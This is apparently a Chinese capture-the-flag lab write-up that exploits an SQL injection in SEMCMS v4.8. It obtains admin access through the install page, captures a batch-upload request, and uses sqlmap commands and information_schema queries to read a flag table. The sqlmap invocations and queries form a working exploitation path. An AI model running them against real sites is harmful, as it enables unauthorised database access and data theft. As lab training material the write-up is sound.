目录
靶标介绍
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入。
开启靶场
发现这个页面什么有价值的东西都没有,然后目录扫描
其他的页面无发现,只有/install/是一个安装页面
localhost 和 127.0.0.1 都试过了发现都是下面的报错页面
把数据库名换成 semcms 发现注册成功了,并且发现了默认的账号密码
点击转到后台,登陆上去是如下页面
根据靶标介绍,在产品管理这一栏,随便勾选一个,点击批量上传进行抓包
把数据包内容保存并重命名为 test.txt
sqlmap 漏洞利用
获取所有数据库
python sqlmap.py -r "D:\desktop\test.txt" --batch --dbs
进入--sql-shell,搜索flag在哪个表里
python sqlmap.py -r "D:\desktop\test.txt" --sql-shell --batch
SELECT TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1
发现 flag 在 semcms 数据库的 flllaaaag 表的 flag 字段
查找 flag 内容
select flag from flllaaaag